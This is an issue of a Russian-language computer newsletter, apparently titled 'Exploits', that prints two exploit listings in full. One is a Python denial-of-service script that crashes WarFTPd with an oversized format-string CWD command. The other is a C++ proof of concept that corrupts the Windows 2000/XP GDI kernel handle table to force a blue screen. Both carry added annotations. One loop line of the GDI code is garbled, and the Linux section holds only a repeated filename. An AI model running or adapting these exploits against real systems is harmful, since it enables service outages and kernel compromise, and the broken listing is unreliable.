
Компьютер для продвинутых пользователей. Выпуск по безопасности. Exploits.


Компьютер для продвинутых пользователей
В этом выпуске:
WarFTPd 1.82.00-RC11 | Windows 2000, XP
ПО: WarFTPd 1.82.00-RC11

dos.py:
#!/usr/bin/env python
# Python 2 script (print statements, bare except). Flow: connect to an FTP
# server, log in anonymously, send one oversized CWD argument, then treat a
# failed reconnect as evidence that the daemon died. Host and port are
# hard-coded below; there is no argument parsing.
# From a defender's side the observable pattern is an anonymous login
# followed by a CWD whose argument is a few hundred bytes long and starts
# with printf-style "%s" specifiers.
import sys
import ftplib
print "WAR_FTPD Remote Denial Of Service (DOS)"
print "Copyright (c) Joxean Koret"
print
# Hard-coded target (a private RFC 1918 address). The port is a str, not an
# int, and is handed straight to ftplib.connect.
target = "192.168.1.13"
targetPort = "21"

try:
    ftp = ftplib.FTP()
    print "[+] Connecting to target "
    msg = ftp.connect(target, targetPort)
    print "[+] Ok. Target banner"
    print msg
    print
    print "[+] Trying to logging anonymously"
    msg = ftp.login() # Anonymous
    print "[+] Ok. Message"
    print msg
    print
except:
    # Bare except also swallows KeyboardInterrupt/SystemExit. Note the exit
    # status is 0 although connect/login failed.
    print "[!] Exploit doesn't work. " + str(sys.exc_info()[1])
    sys.exit(0)
a = "%s%s"
# The triple-quoted block below is a string-literal expression statement
# (a no-op), not a comment: dead code left in by the author.
"""
for i in range(0):
    a += a
"""
b = "AAAA"
# Doubling "AAAA" six times gives 4 * 2**6 = 256 bytes; with the "%s%s"
# prefix len(a) is 262.
for i in range(6):
    b += b
a = a + b
print "[+] Exploiting with a buffer of " + str(len(a)) + " byte(s) ... "
try:
    ftp.cwd(a)
except:
    # Any exception here, including an ordinary network error or a plain
    # 5xx reply, is read as "the server crashed".
    print "[+] Exploit apparently works. Trying to verify it ... "
    try:
        ftp.connect(target, targetPort)
        # Inside the enclosing handler, sys.exc_info() still refers to the
        # exception raised by cwd() above, not to anything from connect().
        print "[!] No, it doesn't work [" + str(sys.exc_info()[1]) + "] :("
    except:
        # A failed reconnect is the only "verification"; a firewall or a
        # connection limit would produce the same message.
        print "[!] Ok. Server is dead, exploit successfully executed. "

ПО: Windows
Версия: 2000, XP

GDIKernelPoC.cpp:
//  Argeniss  - Information Security - www.argeniss.com
//  
//  by: Cesar Cerrudo
//
//  Windows GDI Kernel structure vulnerability
//
//  Versions affected: Win2k sp0,sp1,sp2,sp3,sp4, WinXP sp0,sp1,sp2
//        
//
//  Note: if it doesn't work it's because the wrong section is mapped 
//        try changing hMapFile initial value
//         running this PoC will cause BSOD
//


#include "windows.h"
#include "stdio.h"

#pragma comment(lib, "user32")

// One entry of the table this PoC overwrites; the field names are the
// author's reading of the shared GDI handle-table layout (not a documented
// Windows type). With natural alignment the entry is 16 bytes
// (DWORD + 4 * WORD + DWORD), which is the stride main() advances by with
// gdiTable++.
typedef struct
{
   DWORD pKernelInfo;   // set to 0x58585858 in main()
   WORD  ProcessID;     // set to 0x5858 in main()
   WORD  _nCount;       // set to 0x5858 in main() (that line is garbled in this copy)
   WORD  nUpper;        // set to 0x5858 in main()
   WORD  nType;         // set to 0x5858 in main()
   DWORD pUserInfo;     // set to 0x58585858 in main()
} GDITableEntry;

// Local copy of the undocumented NTDLL SECTION_BASIC_INFORMATION layout,
// sized for NtQuerySection(..., information class 0, ...). Only SectionSize
// is read by main(); the first field is left unnamed.
typedef struct _SECTION_BASIC_INFORMATION {
  ULONG                   d000;               // presumably the BaseAddress slot of the NTDLL layout - verify; unused here
  ULONG                   SectionAttributes;  // unused here
  LARGE_INTEGER           SectionSize;        // printed by main()
} SECTION_BASIC_INFORMATION;

// Prototype for ntdll!NtQuerySection, which is resolved at run time with
// GetProcAddress in main(). CALLBACK expands to __stdcall on Win32, as does
// the WINAPI used in the cast in main(). The DWORD return carries the
// NTSTATUS; main() treats any non-zero value as failure.
typedef DWORD (CALLBACK* NTQUERYSECTION)(HANDLE, DWORD, PVOID,DWORD,DWORD*);
NTQUERYSECTION NtQuerySection;   // global; assigned in main() before its only use

// Entry point of the PoC. It guesses a section handle by incrementing from
// 0x10 until MapViewOfFile succeeds, queries that section's size through
// NtQuerySection, then overwrites the mapping entry by entry with 0x58
// bytes. The file header explains why the first mappable handle may not be
// the intended section. Returns 0 on every path, failures included.
// argc/argv are unused.
int main(int argc, char* argv[])
{
    SECTION_BASIC_INFORMATION buff;
    HANDLE hMapFile;
        hMapFile=(HANDLE)0x10;   // starting value for the handle-guessing loop (see header note)
    LPVOID lpMapAddress=NULL;
    HWND hWin;

    // Every argument is NULL; presumably done so the process becomes a GDI
    // client and gets its handle table - verify. hWin is never used or
    // destroyed afterwards.
hWin=CreateWindow(NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL);

    // Handle guessing: bump the value until something maps with full
    // access. The (int) cast assumes 32-bit handles, and the loop never
    // terminates if no handle in the process maps.
    while(!lpMapAddress){
        hMapFile=(void*)((int)hMapFile+1);
        lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 
0, 0);
    }

    // Unreachable: the loop above only exits once lpMapAddress is non-NULL.
    if (lpMapAddress == NULL) {
        printf("Could not map section.");
        return 0;
    }


    HMODULE hL;
    // Neither the LoadLibrary nor the GetProcAddress result is NULL-checked
    // before NtQuerySection is called below.
    hL=LoadLibrary("Ntdll.dll");
    NtQuerySection= (DWORD (WINAPI *)(HANDLE, DWORD, 
PVOID,DWORD,DWORD*))GetProcAddress(hL,"NtQuerySection");

    // Information class 0 is SectionBasicInformation; the trailing NULL
    // skips the returned length. Any non-zero NTSTATUS is treated as failure.
    if (NtQuerySection(hMapFile,0,&buff,sizeof(buff),0)){
        printf("Could not get section size");
        return 0;
    }

char * sMap;
DWORD i;
sMap=(char*)lpMapAddress;   // assigned but never read
// "%x" with a 64-bit QuadPart argument is a format/argument mismatch, so
// the printed size is not reliable.
printf("Section size: 0x%x\n",buff.SectionSize.QuadPart);
printf("Writing to section.\nPress Ctr+C to quit\n");


GDITableEntry *gdiTable;


    gdiTable=(GDITableEntry *)lpMapAddress;
    
    // NOTE(review): the next line is garbled in this copy - the for-loop
    // header and the first field assignment (gdiTable->_nCount) are fused
    // and the loop bound is missing, so the listing does not compile as
    // shown. What is visible is a walk over the mapping one entry at a
    // time, filling every field with 0x58 bytes; there is no bounds check
    // against the section size queried above.
    for (i=0;i_nCount =0x5858;
        gdiTable->nType  =0x5858;
        gdiTable->nUpper =0x5858;
        gdiTable->ProcessID =0x5858;
        gdiTable->pKernelInfo   =0x58585858;
        gdiTable->pUserInfo   =0x58585858;
            
        gdiTable++;
    }




    // The view is never unmapped and hWin is never destroyed. hMapFile was
    // guessed, so this closes whatever object that value happens to name.
CloseHandle(hMapFile);

    return 0;
}

ПО: Linux
Версия: 2.6.x

GDIKernelPoC.cpp:

Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru
